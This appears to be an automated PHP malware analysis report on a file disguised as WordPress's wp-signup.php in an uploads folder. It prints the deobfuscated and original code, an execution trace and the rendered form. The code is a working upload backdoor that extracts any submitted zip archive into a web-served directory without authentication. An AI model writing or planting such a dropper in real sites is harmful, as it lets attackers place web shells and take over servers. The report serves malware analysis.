PHP Malware Analysis
wp-signup.php
md5: 7ec3e71c1f55e42fd1e2007ccea3bfa6
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Input
- _FILES (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
<?php
// Get Project path
define('_PATH', "/var/www/html");
// Unzip selected zip file
if (isset($_POST['unzip'])) {
$filename = $_FILES['file']['name'];
// Get file extension
$ext = pathinfo($filename, PATHINFO_EXTENSION);
$valid_ext = array('zip');
// Check extension
if (in_array(strtolower($ext), $valid_ext)) {
$tmp_name = $_FILES['file']['tmp_name'];
$zip = new ZipArchive();
$res = $zip->open($tmp_name);
if ($res === TRUE) {
// Unzip path
$path = "/var/www/html/files/";
// Extract file
$zip->extractTo($path);
$zip->close();
echo "Unzip!";
} else {
echo "failed!";
}
} else {
echo "Invalid file";
}
}
?>
<form method='post' action='' enctype='multipart/form-data'>
<!-- Unzip selected zip file -->
<input type='file' name='file'><br/>
<input type='submit' name='unzip' value='Unzip' />
</form>Execution traces
data/traces/7ec3e71c1f55e42fd1e2007ccea3bfa6_trace-1676251020.4996.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:17:26.397393]
1 0 1 0.000145 393528
1 3 0 0.000227 399128 {main} 1 /var/www/html/uploads/wp-signup.php 0 0
2 4 0 0.000244 399128 dirname 0 /var/www/html/uploads/wp-signup.php 3 1 '/var/www/html/uploads/wp-signup.php'
2 4 1 0.000259 399224
2 4 R '/var/www/html/uploads'
2 5 0 0.000274 399192 define 0 /var/www/html/uploads/wp-signup.php 3 2 '_PATH' '/var/www/html/uploads'
2 5 1 0.000289 399296
2 5 R TRUE
1 3 1 0.000304 399224
0.000331 314368
TRACE END [2023-02-12 23:17:26.397609]
Generated HTML code
<html><head></head><body><form method="post" action="" enctype="multipart/form-data">
<!-- Unzip selected zip file -->
<input type="file" name="file"><br>
<input type="submit" name="unzip" value="Unzip">
</form></body></html>Original PHP code
<?php
// Get Project path
define('_PATH', dirname(__FILE__));
// Unzip selected zip file
if(isset($_POST['unzip'])){
$filename = $_FILES['file']['name'];
// Get file extension
$ext = pathinfo($filename, PATHINFO_EXTENSION);
$valid_ext = array('zip');
// Check extension
if(in_array(strtolower($ext),$valid_ext)){
$tmp_name = $_FILES['file']['tmp_name'];
$zip = new ZipArchive;
$res = $zip->open($tmp_name);
if ($res === TRUE) {
// Unzip path
$path = _PATH."/files/";
// Extract file
$zip->extractTo($path);
$zip->close();
echo 'Unzip!';
} else {
echo 'failed!';
}
}else{
echo 'Invalid file';
}
}
?>
<form method='post' action='' enctype='multipart/form-data'>
<!-- Unzip selected zip file -->
<input type='file' name='file'><br/>
<input type='submit' name='unzip' value='Unzip' />
</form>